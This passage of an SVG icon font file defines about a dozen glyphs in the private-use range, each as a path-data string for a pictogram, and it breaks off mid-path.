<glyph unicode="&#xe670;" d="M890.059 954.163l-752.036 0.005c-73.69 0-133.634-59.963-133.634-133.663v-751.927c0-73.719 59.949-133.691 133.634-133.691h752.036c73.681 0 133.644 59.972 133.644 133.691v751.923c0.005 73.704-59.958 133.663-133.644 133.663zM728.177 683.945c51.219 0 92.74-41.522 92.74-92.74s-41.522-92.74-92.74-92.74c-51.219 0-92.736 41.522-92.736 92.74s41.517 92.74 92.736 92.74zM147.258 774.312v-168.186h-25.147c-4.771 0-8.64 3.832-8.64 8.626v217.031c0 7.343 5.474 13.326 12.996 13.326h111.21c7.508 0 12.996-5.96 12.996-13.298v-12.746h171.933c4.804 0 8.645-3.855 8.645-8.598v-48.803h-146.772v12.774c0 7.343-5.488 13.298-13.024 13.298h-111.177c-7.527 0-13.019-6.059-13.019-13.425zM189.714 495.675c-4.785 0-8.64 3.832-8.64 8.612v217.031c0 7.343 5.474 13.326 12.996 13.326h111.187c7.522 0 13.024-5.96 13.024-13.298v-12.746h171.933c4.79 0 8.64-3.855 8.64-8.598v-195.73c0-4.771-3.855-8.598-8.64-8.598h-300.499zM600.975 41.746v281.76h-12.637l-57.537-85.851c-9.372-12.774-28.398-18.97-43.551-18.97h-135.102c-22.438 0-40.663 18.182-40.663 40.601 0 22.382 18.224 40.049 40.663 40.049h122.88l85.247 128.892c20.428 31.173 60.359 46.245 92.514 46.245l167.016 0.099c51.384 0 93.024-41.564 93.024-92.943l0.193-339.883h-312.046zM365.563 679.023h-51.209v-51.181h-51.2v-51.219h51.2v-51.2h51.209v51.2h51.195v51.219h-51.195z" horiz-adv-x="1029" />
<glyph unicode="&#xe671;" d="M899.269 947.539c0 0-781.456 0.237-781.209 0-71.903 0-113.625-37.174-113.625-113.123v-782.991c0-71.050 39.837-109.465 111.692-109.465h786.298c71.846 0 106.452 36.567 106.452 109.465v782.991c0 74.092-35.497 113.123-109.607 113.123zM463.986 29.574c-71.903 0-139.504 28.001-190.342 78.839-50.838 50.829-78.849 118.439-78.849 190.332 0 97.014 52.544 186.902 137.125 234.613l23.263-41.248c-69.714-39.334-113.028-113.426-113.028-193.365 0-59.243 23.083-114.942 64.967-156.845 41.902-41.902 97.601-64.976 156.863-64.976 103.031 0 191.725 69.875 215.718 169.902l46.053-11.039c-29.11-121.424-136.756-206.214-261.771-206.214zM828.845 128.777l-19.672-7.874-9.997 16.801-129.469 240.137h-285.28l-2.303 23.026-41.476 383.251 0.54 0.531c-2.009 5.43-3.487 11.399-4.198 17.407-4.937 41.305 24.542 78.934 65.857 83.871 41.324 4.937 78.801-24.476 83.757-65.791 4.937-41.324-24.533-78.801-65.857-83.738-9.457-1.128-18.667-0.37-27.385 1.838l20.752-180.070 215.737-0.076v-47.37l-210.592-1.781 7.675-83.71h271.152l6.699-10.641 126.152-234.907 49.388 20.221 17.587-43.722-69.070-27.404z" horiz-adv-x="1016" />
<glyph unicode="&#xe672;" d="M889.094 949.62h-745.131c-73.017 0-132.414-59.397-132.414-132.442v-745.051c0-73.055 59.397-132.484 132.414-132.484h745.131c73.008 0 132.433 59.429 132.433 132.484v745.051c0.005 73.045-59.42 132.442-132.433 132.442zM704.274 687.205c13.396 0 24.267-10.876 24.267-24.272 0-13.401-10.871-24.277-24.267-24.277-13.424 0-24.3 10.876-24.3 24.277 0 13.396 10.876 24.272 24.3 24.272zM532.326 841.67c19.119 0 34.601-15.533 34.601-34.601 0-19.124-15.477-34.629-34.601-34.629-19.096 0-34.578 15.505-34.578 34.629 0 19.068 15.482 34.601 34.578 34.601zM344.569 841.917c19.395 0 35.153-15.589 35.153-34.821 0-19.288-15.757-34.849-35.153-34.849-19.395 0-35.101 15.561-35.101 34.849 0.005 19.232 15.701 34.821 35.101 34.821zM455.226 118.001l-0.164-61.613h-145.787v25.89c0 16.781-3.254 27.868-16.543 40.38l-133.948 142.238c-19.18 22.411-29.864 51.102-29.864 80.798v214.797c0 22.261 18.053 40.371 40.357 40.371 22.388 0 40.605-18.109 40.605-40.371v-156.854c-21.453-9.777-34.414-29.607-34.414-51.172 0-14.35 5.728-28.013 16.192-38.561l83.206-91.318c3.867-4.793 9.015-12.255 11.591-20.555 1.431-4.428 1.866-9.216 1.973-15.164h26.39c-0.136 8.351-0.818 15.636-3.231 23.103-4.465 14.383-13.452 26.119-18.769 32.347l-81.976 87.807c-4.961 5.854-7.673 13.298-7.673 20.971 0 17.745 14.462 32.179 32.244 32.179 8.412 0 16.356-3.194 22.406-9.029l169.956-170.657c29.364-30.762 27.447-62.123 27.447-85.586zM544.399 437.886c0 16.576 0 156.303 0 156.303h-15.014c0 0 0-139.727 0-156.303 0-11.236-9.094-20.302-20.302-20.302-11.203 0-20.382 9.071-20.382 20.302 0 16.576 0 274.717 0 274.717l-12.082-0.028-26.493-92.497c-0.435-1.777-1.178-3.395-2.268-4.793-2.604-3.89-7.121-6.055-12.19-5.892-5.069-0.164-9.613 2.025-12.218 5.971-0.926 1.262-1.641 2.712-2.076 4.302l-26.629 92.908-13.069 0.028 38.903-162.578h-34.143v-115.483c0-9.506-7.748-17.254-17.31-17.254-9.506 0-17.184 7.748-17.184 17.254v115.483h-14.57v-115.483c0-9.506-7.781-17.254-17.286-17.254-9.534 0-17.207 7.748-17.207 17.254v115.483h-34.746l39.314 162.578-13.125-0.028-26.937-93.895c-2.029-7.177-10.076-11.147-17.946-8.903-7.893 2.272-12.821 9.122-10.193 18.137l27.648 96.331c11.044 38.491 43.317 37.313 43.317 37.313h68.687c0 0 32.193 1.178 43.289-37.313l13.508-47.067 13.541 47.067c11.040 38.491 43.289 37.313 43.289 37.313h88.765c0 0 32.272 1.178 43.317-37.313l27.424-95.592c0 0 21.621-1.973 21.92-1.973 8.281 0 56.933 0 65.48 0 17.179 0 32.3-13.943 32.296-31.122 0-8.767 0-55.506 0-61.342 0-5.92-4.624-10.689-10.492-10.689-5.835 0-10.623 4.769-10.623 10.689 0 6.794 0 53.917 0 53.917h-10.96c0 0 0-147.484 0-159.16 0-7.865-6.467-14.247-14.327-14.247s-14.247 6.382-14.247 14.247c0 11.671 0 85.128 0 85.128h-11.18c0 0 0-73.452 0-85.128 0-7.865-6.382-14.247-14.252-14.247-7.865 0-14.303 6.382-14.303 14.247 0 10.577 0 145.048 0 170.386-13.915 3.97-32.852 9.342-36.962 10.273-0.168 0.056-0.276 0.136-0.468 0.192-4.629 1.178-8.491 4.222-9.889 8.851l-25.782 93.895-13.13 0.028c0 0 0-258.142 0-274.717 0-11.236-9.207-20.302-20.438-20.302-11.18 0.005-20.274 9.080-20.274 20.307zM905.043 345.694c0-29.701-10.68-58.387-29.864-80.798l-133.943-142.238c-13.293-12.512-16.548-23.599-16.548-40.38v-25.89h-145.791l-0.159 61.613c0 23.468-1.917 54.828 27.447 85.591l169.956 170.657c6.055 5.835 13.999 9.029 22.411 9.029 17.782 0 32.244-14.434 32.244-32.179 0-7.678-2.712-15.117-7.673-20.971l-81.971-87.807c-5.316-6.228-14.303-17.964-18.769-32.347-2.413-7.472-3.095-14.752-3.231-23.103h26.39c0.103 5.948 0.547 10.736 1.973 15.164 2.576 8.295 7.72 15.757 11.591 20.555l83.206 91.323c10.464 10.549 16.197 24.211 16.197 38.561-0.009 21.56-12.966 41.395-34.419 51.167v156.854c0 22.261 18.217 40.371 40.605 40.371 22.308 0 40.357-18.109 40.357-40.371v-214.802z" />
<glyph unicode="&#xe673;" d="M909.944 945.243c0 0-781.791 0.249-781.542 0-72.044 0-112.554-37.256-112.554-113.367v-784.633c0-71.182 36.414-108.477 108.41-108.477h787.944c71.986 0 108.467 35.419 108.467 108.477v784.633c0 74.254-36.472 113.367-110.726 113.367zM799.103 212.298h-658.078v105.271h658.078v-105.271zM854.083 212.729h-35.275v106.506h35.275v-106.506zM854.083 336.652h-35.275v48.291c0 41.984-32.165 50.788-59.162 50.788h-94.715c-29.332 0-54.492 14.556-69 39.936-11.542 20.183-14.901 45.008-10.049 67.546-31.409 3.704-52.463 17.408-65.402 29.61-20.911 19.724-32.902 47.257-32.902 75.556 0 53.258 36.271 107.185 105.596 107.185v-35.275c-55.621 0-70.331-47.037-70.331-71.91 0-18.623 7.962-36.816 21.829-49.898 16.049-15.13 38.673-22.298 65.325-20.738 6.823 0.421 12.69-2.852 16.087-8.412 3.397-5.56 3.455-12.537 0.153-18.145-9.809-16.671-9.685-40.52 0.306-58.004 5.78-10.116 17.14-22.174 38.386-22.174h94.715c58.244 0 94.428-32.979 94.428-86.064v-48.291zM761.406 519.67h-56.014c-6.623 0-12.7 3.713-15.714 9.618s-2.46 12.996 1.426 18.365c12.776 17.609 20.403 39.209 20.403 57.784 0 46.645-37.008 80.504-87.987 80.504v35.275c70.273 0 123.263-49.774 123.263-115.779 0-16.461-3.924-33.907-11.13-50.501h25.744c92.39 0 147.609-78.015 147.609-153.447v-64.837h-35.275v64.837c0.010 57.296-39.362 118.181-112.324 118.181zM909.216 212.729h-35.275v106.506h35.275v-106.506z" />
<glyph unicode="&#xe674;" d="M896.256 945.332c0 0-780.61 0.247-780.383 0-71.945 0-112.393-37.196-112.393-113.19v-783.455c0-71.092 36.361-108.307 108.26-108.307h786.764c71.889 0 108.297 35.366 108.297 108.307v783.455c0.009 74.145-36.399 113.19-110.545 113.19zM723.854 827.913c33.773 0 61.184-27.411 61.184-61.222 0-33.792-27.411-61.184-61.184-61.184-33.811 0-61.222 27.392-61.222 61.184 0 33.811 27.411 61.222 61.222 61.222zM284.767 823.969c33.792 0 61.203-27.401 61.203-61.203 0-33.801-27.411-61.203-61.203-61.203-33.801 0-61.203 27.401-61.203 61.203 0 33.801 27.401 61.203 61.203 61.203zM429.435 409.344c0-13.833-11.207-25.041-25.041-25.041-13.815 0-25.050 11.207-25.050 25.041v175.388h-16.792v-200.448h-0.104v-283.24c0-18.432-14.933-33.384-33.384-33.384-18.423 0-33.384 14.952-33.384 33.384v283.24h-22.035v-283.24c0-18.432-14.943-33.384-33.384-33.384-18.413 0-33.384 14.952-33.384 33.384v283.24h-0.123v200.448h-16.792v-175.388c0-13.833-11.236-25.041-25.041-25.041-13.833 0-25.050 11.207-25.050 25.041v178.034c0 0.73 0.038 1.451 0.095 2.152v30.91c0 32.521 26.368 58.889 58.889 58.889h171.567c32.54 0 58.889-26.368 58.889-58.889v-30.91c0.057-0.702 0.104-1.413 0.095-2.152v-178.034zM521.425 71.661h-43.179v754.963h43.179v-754.963zM877.739 410.975c-13.35-3.575-27.070 4.352-30.663 17.702l-43.131 159.962h-18.11l77.17-289.422h-72.391v-199.822c0-15.379-12.459-27.828-27.819-27.828-15.379 0-27.847 12.449-27.847 27.828v199.813h-22.13v-199.813c0-15.379-12.459-27.828-27.819-27.828-15.379 0-27.828 12.449-27.828 27.828v199.813h-72.429l76.904 289.432h-17.645l-42.373-159.962c-3.593-13.35-17.313-21.276-30.663-17.702-13.369 3.593-21.295 17.313-17.702 30.663l53.931 203.634c0.265 0.967 0.578 1.906 0.948 2.797 5.452 20.357 23.969 35.356 46.023 35.356h138.961c21.153 0 39.064-13.815 45.303-32.891 0.872-1.631 1.593-3.394 2.105-5.243l54.907-203.653c3.575-13.35-4.352-27.070-17.702-30.663z" horiz-adv-x="1018" />
<glyph unicode="&#xe675;" d="M902.58 948.499c0 0-780.61 0.247-780.383 0-71.945 0-112.393-37.196-112.393-113.19v-783.455c0-71.092 36.361-108.307 108.26-108.307h786.764c71.889 0 108.297 35.366 108.297 108.307v783.455c0.009 74.145-36.399 113.19-110.545 113.19zM491.985 586.022c0-24.576-22.386-50.897-51.447-50.897v-414.957c0-58.918-80.289-58.918-80.289 0v414.957c-28.274 0-52.897 21.779-52.897 54.405v228.371c0 19.873 28.719 20.632 28.719-0.777v-168.808h24.045v170.363c0 18.261 27.667 19.418 27.667-0.777v-169.586h24.841v170.136c0 19.086 26.852 19.854 26.852-0.759v-169.377h24.453v170.136c0 18.887 28.046 19.636 28.046-0.759v-231.671zM706.162 120.348c0-57.609-80.45-56.747-80.45 0v255.716h-42.837v388.75c0 90.501 123.288 90.501 123.288 0v-644.466z" />
<glyph unicode="&#xe676;" d="M550.799 352.008c4.403 2.26 7.498 6.111 8.909 10.783 1.576 4.672 1.133 9.622-1.104 13.855-4.535 8.654-16.011 12.33-24.774 7.796-8.928-4.676-12.467-15.704-7.796-24.642 3.261-6.078 9.49-9.9 16.285-9.9 2.954 0.005 5.941 0.694 8.48 2.109zM518.092 516.259c-10.037 0-18.248-8.216-18.248-18.286 0-10.037 8.211-18.248 18.248-18.248 10.202 0 18.413 8.211 18.413 18.248 0 10.075-8.211 18.286-18.413 18.286zM535.925 435.122c-2.411 9.627-12.448 15.846-22.066 13.444-4.813-1.133-8.791-3.954-11.335-8.211-2.543-4.096-3.402-9.041-2.265-13.859 2.128-8.211 9.343-14.020 17.833-14.020 1.411 0 2.987 0.278 4.393 0.552 9.763 2.411 15.846 12.34 13.439 22.094zM440.782 387.726c-66.499 2.378-104.547-147.149-81.651-286.781 11.745-62.775 48.831 1.548 79.881 6.795 34.372 5.785 53.696 9.787 55.329 27.738 5.969 65.281-18.998 250.979-53.559 252.248zM382.754 266.648c4.252 8.791 15.591 12.755 24.491 8.352 4.398-2.26 7.659-5.941 9.207-10.618s1.269-9.622-0.859-14.020c-3.096-6.22-9.49-10.174-16.568-10.174-2.68 0-5.502 0.689-8.065 1.958-4.37 2.128-7.63 5.946-9.178 10.481-1.571 4.676-1.269 9.622 0.972 14.020zM367.040 192.741c-0.137 4.978 1.553 9.65 4.813 13.189 3.402 3.681 7.937 5.644 12.746 5.946 10.896 0 18.692-7.8 19.107-17.559 0.278-10.202-7.494-18.692-17.559-19.107h-0.689c-9.929 0-17.974 7.772-18.418 17.531zM422.261 125.492c-1.279-4.813-4.261-8.763-8.357-11.306-2.85-1.708-6.083-2.543-9.485-2.543-6.389 0-12.472 3.237-15.704 8.768-2.572 4.256-3.261 9.207-2.128 13.874 1.279 4.813 4.233 8.763 8.357 11.335 8.352 4.945 20.102 1.963 25.189-6.389 2.543-4.087 3.261-9.065 2.128-13.737zM457.374 319.604c5.804-8.352 3.818-19.829-4.398-25.633-3.124-2.133-6.8-3.242-10.618-3.242-5.946 0-11.476 2.827-15.016 7.772-2.822 3.954-3.818 8.787-2.959 13.605 0.835 4.813 3.407 9.041 7.494 11.892 7.937 5.672 19.829 3.544 25.496-4.393zM502.388 384.436c-8.626 4.535-20.102 0.859-24.637-7.796-4.672-8.905-1.279-19.961 7.63-24.637 2.709-1.411 5.663-2.1 8.518-2.1 6.941 0 13.161 3.676 16.261 9.759 2.26 4.398 2.704 9.348 1.293 14.020-1.571 4.672-4.667 8.489-9.065 10.754zM499.844 565.222c0-10.174 8.211-18.385 18.248-18.385 10.202 0 18.413 8.216 18.413 18.385 0 10.065-8.211 18.276-18.413 18.276-10.037 0-18.248-8.211-18.248-18.276zM892.55 955.503h-751.989c-73.686 0-133.63-59.954-133.63-133.644v-751.97c0-73.723 59.944-133.667 133.63-133.667h751.984c73.686 0 133.658 59.944 133.658 133.667v751.97c0.005 73.695-59.968 133.644-133.653 133.644zM886.435 45.29l-125.834-0.057v211.888h-37.964v-211.888l-410.407 0.057v211.841h-37.024v-211.841l-128.599-0.057v244.689c0 87.677 76.451 173.485 193.276 173.4h101.64v23.226h-25.001c-34.722 0-62.903 28.158-62.903 62.912v19.215c6.47 1.906 11.618 7.107 12.864 13.963 1.963 9.924-4.53 19.546-14.459 21.372-8.4 1.661-16.342-2.765-19.909-9.952-7.078 0.085-12.746 5.781-12.746 12.831 0 1.798 0.33 3.516 0.996 5.007l33.268 83.954c0 0 3.483 34.792 6.583 48.062 13.855 59.892 80.599 114.23 153.015 114.23 88.121 0 159.546-71.425 159.546-159.579 0-50.879-23.892-96.228-61.001-125.428v-109.804h93.821c114.886 0.080 180.941-83.595 180.937-150.301l-0.099-267.741zM446.757 641.267v0.415c8.352 0.996 15.152 7.937 15.841 16.559 0.444 4.95-1.133 9.627-4.228 13.468-3.129 3.681-7.659 5.946-12.472 6.361l-1.548 0.137c-9.485 0-17.417-7.494-18.276-16.837-0.859-10.065 6.663-18.965 16.7-19.824l3.983-0.278zM595.095 387.202c-34.505-1.269-59.501-186.996-53.536-252.22 1.633-18.003 20.985-22.014 55.353-27.818 31.050-5.229 66.39-66.013 79.881-6.781 22.929 139.613-15.091 289.136-81.698 286.819zM608.836 298.501c-3.539-4.945-9.070-7.767-15.016-7.767-3.818 0-7.494 1.104-10.613 3.232-8.211 5.804-10.174 17.276-4.37 25.633 5.639 7.937 17.554 10.065 25.463 4.398 8.216-5.809 10.207-17.285 4.535-25.496zM647.494 120.405c-3.261-5.361-9.339-8.763-15.704-8.763-3.261 0-6.526 0.831-9.339 2.548-4.261 2.543-7.22 6.493-8.357 11.306-1.293 4.832-0.444 9.65 1.963 13.874 5.115 8.211 16.865 11.335 25.218 6.248 8.626-5.252 11.443-16.422 6.22-25.213zM669.144 192.741c-0.415-9.763-8.489-17.531-18.248-17.531h-0.713c-4.945 0.278-9.48 2.407-12.883 5.946-3.261 3.539-4.95 8.211-4.813 13.161 0.439 9.759 8.485 17.559 18.408 17.559 10.754-0.444 18.692-8.933 18.248-19.135zM653.435 266.648c4.535-9.065 0.864-19.961-8.206-24.496-2.543-1.274-5.224-1.963-8.211-1.963-6.941 0-13.161 3.954-16.285 10.174-2.27 4.398-2.543 9.343-0.996 14.020 1.576 4.672 4.809 8.357 9.207 10.618 8.923 4.398 20.235 0.439 24.491-8.352zM369.721 657.693c-3.818-2.987-6.361-7.215-6.913-12.194-0.58-4.813 0.694-9.622 3.822-13.439 3.402-4.54 8.763-7.083 14.435-7.083 3.954 0 8.074 1.411 11.198 3.954 3.954 2.992 6.361 7.39 6.913 12.198 0.58 4.818-0.689 9.622-3.818 13.576-5.951 7.659-17.979 9.070-25.638 2.987zM501.392 610.821c3.818 0 7.494 1.133 10.618 3.261 8.216 5.804 10.202 17.262 4.398 25.638-5.663 7.909-17.554 10.037-25.487 4.37-4.091-2.822-6.635-7.078-7.494-11.892-0.864-4.818 0.274-9.627 3.091-13.581 3.398-4.974 8.928-7.796 14.874-7.796z" horiz-adv-x="1029" />
<glyph unicode="&#xe677;" d="M602.314 536.369c-22.617 0-40.866-18.277-40.866-40.847 0-22.542 18.249-40.819 40.866-40.819 22.514 0 40.791 18.277 40.796 40.819-0.005 22.57-18.282 40.847-40.796 40.847zM502.408 600.693c-22.542 0-40.843-18.305-40.843-40.847s18.3-40.819 40.843-40.819c22.481 0 40.758 18.272 40.758 40.819 0 22.547-18.272 40.847-40.758 40.847zM531 759.705c-23.693 0-42.961-19.212-42.961-42.994 0-23.73 19.268-43.022 42.961-43.022 23.754 0 42.961 19.292 42.961 43.022 0 23.782-19.207 42.994-42.961 42.994zM888.578 950.972h-748.567c-73.348 0-133.017-59.674-133.017-133.054v-748.469c0-73.38 59.669-133.082 133.017-133.082h748.567c73.348 0 133.017 59.702 133.017 133.082v748.469c0 73.38-59.669 133.054-133.017 133.054zM452.533 115.74l-0.164-61.9h-146.451v26.009c0 16.873-3.274 28.019-16.624 40.57l-134.557 142.909c-19.268 22.509-30.001 51.332-30.001 81.164v215.792c0 22.35 18.136 40.542 40.542 40.542 22.49 0 40.791-18.192 40.791-40.542v-157.574c-21.551-9.827-34.572-29.752-34.576-51.407 0-14.421 5.754-28.155 16.267-38.752l83.583-91.733c3.885-4.815 9.061-12.307 11.644-20.644 1.433-4.458 1.87-9.254 1.982-15.252h26.507c-0.132 8.399-0.822 15.717-3.241 23.233-4.486 14.444-13.514 26.229-18.855 32.472l-82.347 88.21c-4.984 5.89-7.708 13.378-7.708 21.081 0 17.835 14.529 32.312 32.392 32.312 8.45 0 16.431-3.194 22.514-9.056l170.726-171.44c29.503-30.913 27.578-62.408 27.578-85.993zM264.389 580.575c0 137.977 112.321 250.307 250.321 250.307 137.996 0 250.288-112.33 250.293-250.307 0-138.066-112.297-250.335-250.293-250.335-138 0-250.321 112.269-250.321 250.335zM904.488 344.491c0-29.837-10.729-58.655-30.001-81.164l-134.557-142.909c-13.354-12.551-16.624-23.698-16.624-40.57v-26.009h-146.455l-0.164 61.9c0 23.585-1.921 55.085 27.578 85.997l170.731 171.44c6.083 5.862 14.064 9.056 22.514 9.056 17.864 0 32.392-14.477 32.392-32.312 0-7.708-2.724-15.191-7.708-21.081l-82.347-88.21c-5.341-6.243-14.369-18.028-18.855-32.472-2.428-7.52-3.11-14.834-3.246-23.233h26.511c0.103 5.998 0.545 10.794 1.982 15.252 2.588 8.333 7.755 15.825 11.644 20.644l83.588 91.733c10.512 10.597 16.271 24.332 16.271 38.752-0.009 21.654-13.025 41.585-34.576 51.407v157.574c0 22.35 18.3 40.542 40.791 40.542 22.411 0 40.542-18.192 40.542-40.542v-215.796zM450.551 662.899h-82.347v-82.93h82.347v82.93zM433.185 597.058c-10.926 0-37.071 0-48.048 0 0 11.067 0 37.71 0 48.743 10.977 0 37.122 0 48.048 0 0-11.034 0-37.681 0-48.743zM453.031 510.027c-22.537 0-40.814-18.249-40.814-40.847 0-22.57 18.272-40.819 40.814-40.819 22.514 0 40.763 18.254 40.763 40.819 0 22.598-18.249 40.847-40.763 40.847zM610.952 656.346c-22.514 0-40.814-18.249-40.814-40.847 0-22.542 18.3-40.847 40.814-40.847 22.598 0 40.871 18.305 40.866 40.847 0.005 22.598-18.268 40.847-40.866 40.847zM514.71 807.729c-125.229 0-227.201-101.949-227.201-227.159 0-125.238 101.973-227.159 227.201-227.159 125.196 0 227.14 101.926 227.14 227.159 0.005 125.21-101.944 227.159-227.14 227.159zM514.931 383.469c-108.661 0-197.035 88.355-197.035 196.993 0 108.61 88.374 197.050 197.035 197.050 108.6 0 196.951-88.44 196.951-197.050 0-108.638-88.346-196.993-196.951-196.993z" />
<glyph unicode="&#xe678;" d="M890.768 953.257h-745.173c-72.989 0-132.386-59.397-132.386-132.442v-745.089c0-73.041 59.401-132.442 132.386-132.442h745.173c73.013 0 132.437 59.401 132.437 132.442v745.089c0 73.045-59.425 132.442-132.437 132.442zM758.050 734.65c-87.428-8.463-92.497 91.29-92.497 91.29 102.358-7.949 92.497-91.29 92.497-91.29zM320.666 634.045c13.368-52.112-23.646-95.428-71.727-99.015-1.781 60.879 31.314 83.893 71.727 99.015zM320.666 540.183c13.368-52.060-23.646-95.396-71.727-98.963-1.781 60.851 31.314 83.865 71.727 98.963zM320.666 446.312c13.368-52.051-23.646-95.4-71.727-98.935-1.781 60.856 31.314 83.809 71.727 98.935zM207.624 714.044c31.202-29.864 52.547-64.166 26.792-119.317-42.713 22.304-59.56 76.744-26.792 119.317zM153.567 609.554c40.385-15.154 73.508-38.169 71.699-99.047-48.081 3.619-85.123 46.908-71.699 99.047zM153.567 515.659c40.385-15.093 73.508-38.108 71.699-98.959-48.081 3.554-85.123 46.903-71.699 98.959zM153.567 421.816c40.385-15.145 73.508-38.080 71.699-98.959-48.081 3.535-85.123 46.88-71.699 98.959zM354.996 51.427l163.213 282.783 163.185-282.783h-326.399zM177.62 244.065l-10.329 37.972 691.532 188.14 10.273-38-691.476-188.112zM878.527 562.421c0 0-24.412-45.921-43.237-66.466-9.207-9.179-22.851-15.725-36.794-15.725-17.071 0.005-32.277 8.36-41.4 21.289-9.122-12.933-24.356-21.289-41.423-21.289-13.939 0-27.583 6.546-36.789 15.725-18.825 20.55-43.237 66.466-43.237 66.466-13.677 27.779-21.013 49.264-21.013 70.988 0 46.272 37.453 86.409 83.842 86.409 22.851 0 43.48-9.151 58.63-23.945 15.15 14.794 35.751 23.945 58.602 23.945 46.389 0 83.842-40.137 83.842-86.409-0.009-21.724-7.35-43.209-21.022-70.988zM419.849 88.875h196.716l-98.355 170.391z" />
<glyph unicode="&#xe679;" d="M899.351 946.732c0 0-781.535 0.246-781.289 0-71.92 0-113.646-37.178-113.646-113.134v-783.071c0-71.057 39.831-109.476 111.694-109.476h786.378c71.853 0 106.463 36.571 106.463 109.476v783.071c0.009 74.109-35.491 113.134-109.6 113.134zM516.563 820.473c57.439 0 103.999-46.56 103.999-103.999s-46.56-104.008-103.999-104.008-103.999 46.569-103.999 104.008 46.569 103.999 103.999 103.999zM438.749 97.39l-98.294 102.198c-21.105 21.522-26.933 61.277-4.312 83.898 0.066 0.095 70.337 70.441 70.337 70.441l82.619-82.638-60.642-60.538 62.14-62.159c36.685-36.694-13.912-89.149-51.848-51.203zM691.25 199.589l-98.303-102.198c-37.926-37.945-88.542 14.509-51.848 51.203l62.14 62.159-60.633 60.538 82.61 82.638c0 0 70.28-70.347 70.356-70.441 22.612-22.621 16.774-62.377-4.321-83.898zM714.041 388.443l-84.154 86.467v-78.97h-227.444v78.525l-82.050-84.628c-37.983-37.993-88.476 10.709-50.417 48.768l139.698 138.731c11.296 11.221 24.156 17.617 43.764 17.617h124.838c19.608 0 32.847-6.179 44.456-17.617l141.66-140.475c36.211-36.201-15.599-84.998-50.35-48.417z" horiz-adv-x="1018" />
<glyph unicode="&#xe67a;" d="M260.627 369.355v69.265h195.826l-184.33 184.33c-35.241-49.229-56.078-109.442-56.078-174.466 0-165.666 134.782-300.447 300.447-300.447 65.014 0 125.237 20.828 174.466 56.069l-165.241 165.241h-265.090zM516.492 748.95c-65.778 0-126.638-21.311-176.176-57.305l253.025-253.015h100.284v-69.265h-31.010l97.038-97.038c35.995 49.538 57.296 110.399 57.296 176.167-0.010 165.666-134.791 300.457-300.457 300.457zM729.813 369.645h-23.204v70.086h23.204v-70.086zM766.087 369.645h-23.204v70.086h23.204v-70.086zM765.942 493.858v-42.68h-23.204v42.68c0 37.695-25.909 77.766-73.902 77.766h-36.845c-4.357 0-8.356 2.444-10.337 6.328-1.98 3.883-1.613 8.549 0.947 12.085 8.395 11.583 13.418 25.793 13.418 38.014 0 30.237-23.639 52.253-56.417 52.92v-4.705h-23.204v27.262c-35.096-1.014-44.505-31.135-44.505-47.23 0-12.259 5.236-24.219 14.355-32.826 10.568-9.96 25.387-14.713 42.989-13.66 4.309 0.203 8.337-1.874 10.588-5.535 2.222-3.652 2.261-8.25 0.097-11.94-6.453-10.965-6.376-26.663 0.203-38.158 3.816-6.646 11.274-14.587 25.252-14.587h62.329c38.323 0 62.126-21.697 62.126-56.629v-31.773h-23.204v31.773c0 27.629-21.156 33.425-38.912 33.425h-62.329c-19.301 0-35.85 9.573-45.394 26.276-7.593 13.283-9.805 29.609-6.617 44.438-20.664 2.444-34.526 11.467-43.037 19.485-13.756 12.974-21.649 31.097-21.649 49.712 0 34.584 23.282 69.526 67.719 70.443v6.936h23.204v-29.512c45.491-0.705 79.621-33.164 79.621-76.114 0-10.829-2.579-22.306-7.323-33.222h16.944c60.764 0 97.087-51.335 97.087-100.97zM911.843 954.155c0.010 0-789.33 0.261-789.079 0-72.743 0-113.645-37.608-113.645-114.456v-792.209c0-71.873 36.767-109.529 109.442-109.529h795.571c72.675 0 109.51 35.763 109.51 109.529v792.209c0 74.984-36.825 114.456-111.8 114.456zM516.492 61.797c-213.214 0-386.686 173.471-386.686 386.686 0 213.224 173.471 386.695 386.686 386.695 213.224 0 386.695-173.471 386.695-386.695 0-213.214-173.471-386.686-386.695-386.686z" />
<glyph unicode="&#xe67b;" d="M318.788 541.762c-18.742 0-33.961-15.163-33.961-33.853 0-18.751 15.219-33.942 33.961-33.942 18.578 0 33.825 15.191 33.825 33.942 0 18.686-15.247 33.853-33.825 33.853zM586.945 196.721h71.699v-38.837h-71.699v38.837zM586.945 251.848h71.699v-38.78h-71.699v38.78zM586.945 141.533h71.699v-38.837h-71.699v38.837zM586.945 307.031h71.699v-38.752h-71.699v38.752zM887.85 950.972h-748.539c-73.319 0-132.988-59.679-132.988-133.031v-748.521c0-73.385 59.669-133.054 132.988-133.054h748.535c73.348 0 133.045 59.669 133.045 133.054v748.521c0.005 73.357-59.693 133.031-133.040 133.031zM733.513 301.662v-256.611h-74.865v41.294h-71.699v-41.294h-176.043v92.54h-47.367c-65.832 0-119.141 53.375-119.141 119.291v84.489h-40.542c-13.486 0-24.332 10.902-24.332 24.332 0 3.359 0.601 6.633 1.87 9.474l62.999 159.039c0 0 6.6 65.893 12.434 91.103 26.29 113.462 152.783 216.482 289.956 216.482 167.039 0 302.31-135.365 302.315-302.414 0.009-96.42-45.234-182.408-115.585-237.728zM716.894 727.698c-12.166 27.164-39.419 46.127-70.933 46.127-6.304 0-12.33-0.827-18.164-2.231-13.927 12.908-32.505 20.86-52.9 20.86-15.877 0-30.631-4.763-42.961-12.964-10.926 5.89-23.374 9.193-36.634 9.193-26.784 0-50.425-13.486-64.489-34.046-1.841 0.113-3.659 0.277-5.641 0.277-37.32 0-68.34-26.201-76.020-61.219-28.4-12.11-48.245-40.265-48.245-73.080 0-43.9 35.535-79.515 79.487-79.515 15.994 0 30.936 4.763 43.327 12.908 12.438-8.45 27.47-13.378 43.68-13.378 16.159 0 31.185 5.007 43.708 13.514 8.779-9.822 20.837-17.338 32.392-21.823 24.219-10.348 43.459-39.447 43.459-70.135v-83.545h28.019v87.862c-0.244 30.833 11.147 55.991 34.901 69.862 6.943 4.209 12.556 8.446 17.23 13.044 0.362 0.55 0.803 1.019 1.273 1.433 6.106 6.553 10.043 13.927 12.048 23.12-5.754 1.79-11.889 2.724-18.084 2.724-7.68 0-15.468-1.489-23.12-4.542-4.213-1.705-8.92 0.329-10.658 4.514-1.7 4.181 0.305 8.944 4.547 10.677 9.554 3.936 19.461 5.726 29.231 5.726 6.825 0 13.486-0.883 19.954-2.588-0.136 34.074-27.714 61.604-61.788 61.712-0.080 0-0.132 0-0.132 0-0.085 0-0.136 0.028-0.136 0.028-12.579 0-24.468 3.030-34.901 8.23-9.911-11.508-14.923-25.821-14.923-40.302 0-0.301 0-0.606 0-0.907 0.061-0.249 0-0.413 